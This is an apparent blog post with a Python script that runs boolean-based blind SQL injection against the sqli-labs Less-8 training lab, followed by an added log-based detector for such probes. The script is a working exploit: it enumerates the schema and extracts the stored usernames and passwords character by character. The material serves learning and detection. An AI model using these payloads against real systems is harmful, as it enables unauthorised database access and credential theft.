
sqli-labs Less-8: boolean-based blind injection script

I wrote this on a high-speed train during the first winter break of my freshman year, when I was just getting started as a complete beginner. It is suitable for newcomers: the logic is very simple, it exercises your basic coding ability and your understanding of how SQL injection works and is exploited, and finishing it gives you a real sense of achievement and makes you confident.

```python
import requests
import string

# Target is the local sqli-labs Less-8 page (boolean-based blind: the page prints
# 'You are in...........' when the injected condition is true and nothing otherwise).
url = 'http://127.0.0.1/sqli/Less-8/'

# Note: MySQL string comparison is case-insensitive under the default collation,
# so every substr(...)='x' check below matches both cases and mixed-case values
# come back in whatever case the character set tries first (lowercase here).

# Step 1: length of the current database name
i = 0
db_name_len = 0
print('[+]正在猜解数据库长度......')
while True:
    payload = url + "?id=1'and length(database())=%d--+" % i
    res = requests.get(payload)
    # print(payload)
    if 'You are in...........' in res.text:
        db_name_len = i
        print('数据库长度为:' + str(db_name_len))
        break
    if i == 30:
        print('error!')
        break
    i += 1

# Step 2: the database name, one character at a time
print("[+]正在猜解数据库名字......")
db_name = ''
for i in range(1, db_name_len + 1):
    # print(i)
    for k in string.ascii_lowercase:
        # print(k)
        payload = url + "?id=1'and substr(database(),%d,1)='%s'--+" % (i, k)
        res = requests.get(payload)
        # print(payload)
        if 'You are in...........' in res.text:
            db_name += k
            # print(db_name)
            break
print("数据库为: %s" % db_name)

# Step 3: how many tables the schema has
print("[+]正在猜解表的数量......")
tab_num = 0
while True:
    payload = url + "?id=1'and (select count(table_name) from information_schema.tables where table_schema='security')=%d--+" % tab_num
    res = requests.get(payload)
    if 'You are in...........' in res.text:
        print("%s数据库共有" % db_name + str(tab_num) + "张表")
        break
    else:
        tab_num += 1

# Step 4: for every table, its name length, its name, then its columns
print("[+]开始猜解表名......")
for i in range(1, tab_num + 1):
    tab_len = 0
    while True:
        payload = url + "?id=1'and (select length(table_name) from information_schema.tables where table_schema='security' limit %d,1)=%d--+" % (i - 1, tab_len)
        res = requests.get(payload)
        # print(payload)
        if 'You are in...........' in res.text:
            # print('第%d张表长度为:' % i + str(tab_len))
            break
        if tab_len == 30:
            print('error!')
            break
        tab_len += 1
    tab_name = ''
    for j in range(1, tab_len + 1):
        for m in string.ascii_lowercase:
            payload = url + "?id=1'and substr((select table_name from information_schema.tables where table_schema='security' limit %d,1),%d,1)='%s'--+" % (i - 1, j, m)
            res = requests.get(payload)
            if 'You are in...........' in res.text:
                tab_name += m
                # print(tab_name)
                break
    print("[-]第%d张表名为: %s" % (i, tab_name))

    # Try to guess the columns of this table. The filter is on table_name only,
    # so a same-named table in another schema would be counted as well.
    dump_num = 0
    while True:
        payload = url + "?id=1'and (select count(column_name) from information_schema.columns where table_name='%s')=%d--+" % (tab_name, dump_num)
        res = requests.get(payload)
        if 'You are in...........' in res.text:
            print("%s表下有%d个字段" % (tab_name, dump_num))
            break
        dump_num += 1
    for a in range(1, dump_num + 1):
        dump_len = 0
        while True:
            payload = url + "?id=1'and (select length(column_name) from information_schema.columns where table_name='%s' limit %d,1)=%d--+" % (tab_name, a - 1, dump_len)
            res = requests.get(payload)
            # print(payload)
            if 'You are in...........' in res.text:
                # print("第%d个字段长度为%d" % (a, dump_len))
                break
            dump_len += 1
            if dump_len == 30:
                print("error!!")
                break
        dump_name = ''
        # use 'c' as the position index so the outer table index 'i' is not shadowed
        for c in range(1, dump_len + 1):
            for j in (string.ascii_lowercase + '_-'):
                payload = url + "?id=1'and substr((select column_name from information_schema.columns where table_name='%s' limit %d,1),%d,1)='%s'--+" % (tab_name, a - 1, c, j)
                res = requests.get(payload)
                if 'You are in...........' in res.text:
                    dump_name += j
                    # print(dump_name)
                    break
        print(dump_name)

# Step 5: usernames in security.users (row count, then each value)
print("[+]开始猜解users表下的username......")
usn_num = 0
char = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890_-"
while True:
    payload = url + "?id=1'and (select count(username) from security.users)=%d--+" % usn_num
    res = requests.get(payload)
    if "You are in" in res.text:
        # print(usn_num)  # 13
        break
    usn_num += 1
for i in range(1, usn_num + 1):
    usn_len = 0
    while True:
        payload = url + "?id=1'and (select length(username) from security.users limit %d,1)=%d--+" % (i - 1, usn_len)
        res = requests.get(payload)
        if "You are in" in res.text:
            # print("第%d的长度为%d" % (i, usn_len))
            break
        usn_len += 1
    usr_name = ''
    for k in range(1, usn_len + 1):
        for m in char:
            payload = url + "?id=1'and substr((select username from security.users limit %d,1),%d,1)='%s'--+" % (i - 1, k, m)
            res = requests.get(payload)
            if "You are in" in res.text:
                usr_name += m
                break
    print(usr_name)

# Step 6: passwords in security.users, same procedure with a wider character set
print("[+]开始猜解users表下的password......")
usn_num = 0
char = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890_-@!"
while True:
    payload = url + "?id=1'and (select count(password) from security.users)=%d--+" % usn_num
    res = requests.get(payload)
    if "You are in" in res.text:
        # print(usn_num)  # 13
        break
    usn_num += 1
for i in range(1, usn_num + 1):
    usn_len = 0
    while True:
        payload = url + "?id=1'and (select length(password) from security.users limit %d,1)=%d--+" % (i - 1, usn_len)
        res = requests.get(payload)
        if "You are in" in res.text:
            # print("第%d的长度为%d" % (i, usn_len))
            break
        usn_len += 1
    passwd = ''
    for k in range(1, usn_len + 1):
        for m in char:
            payload = url + "?id=1'and substr((select password from security.users limit %d,1),%d,1)='%s'--+" % (i - 1, k, m)
            res = requests.get(payload)
            if "You are in" in res.text:
                passwd += m
                break
    print(passwd)
```
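From the defending side, a script like the one above leaves a very recognisable trail: one client sending hundreds of near-identical `id=` requests whose decoded values carry `length(`, `substr(`, `information_schema` and a `--+` comment. The following detector is an added example, not part of the original post; it runs over constructed Apache-style access-log lines shaped like the probes above and flags clients that exceed a probe-count threshold.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed sample access-log lines (Apache combined format, trimmed). The first
# four mirror the URL-encoded shape of the probes the script above sends; the last
# is a benign request for comparison.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Nov/2025:10:00:01 +0000] "GET /sqli/Less-8/?id=1%27and%20length(database())%3D8--%2B HTTP/1.1" 200 721
10.0.0.5 - - [01/Nov/2025:10:00:01 +0000] "GET /sqli/Less-8/?id=1%27and%20substr(database()%2C1%2C1)%3D%27s%27--%2B HTTP/1.1" 200 721
10.0.0.5 - - [01/Nov/2025:10:00:02 +0000] "GET /sqli/Less-8/?id=1%27and%20(select%20count(table_name)%20from%20information_schema.tables%20where%20table_schema%3D%27security%27)%3D4--%2B HTTP/1.1" 200 721
10.0.0.5 - - [01/Nov/2025:10:00:02 +0000] "GET /sqli/Less-8/?id=1%27and%20substr((select%20username%20from%20security.users%20limit%200%2C1)%2C1%2C1)%3D%27d%27--%2B HTTP/1.1" 200 721
192.168.1.9 - - [01/Nov/2025:10:00:03 +0000] "GET /sqli/Less-8/?id=3 HTTP/1.1" 200 721
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d+)'
)

# Substrings a boolean-blind oracle query needs; a legitimate numeric id carries none.
PROBE_MARKERS = ("length(", "substr(", "information_schema", "select ", "--+", "-- ")


def decode_query(path):
    """Return the URL-decoded query string (text after '?'), lower-cased."""
    _, _, query = path.partition("?")
    return unquote_plus(query).lower()


def is_blind_probe(path):
    """True when the decoded query has a quote break-out plus a blind-SQLi marker."""
    q = decode_query(path)
    return "'" in q and any(marker in q for marker in PROBE_MARKERS)


def find_blind_sqli_clients(log_text, threshold=3):
    """Count probe-shaped requests per client IP; return clients at or above threshold."""
    hits = Counter()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and is_blind_probe(m.group("path")):
            hits[m.group("ip")] += 1
    return {ip: n for ip, n in hits.items() if n >= threshold}


if __name__ == "__main__":
    print(find_blind_sqli_clients(SAMPLE_LOG))  # {'10.0.0.5': 4}
```

The real signal in production is the volume: a single blind-injection run against the `users` table issues thousands of such requests in seconds, so a per-IP count over a short window catches it even if the marker list is evaded.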
http://www.zskr.cn/news/37911.html
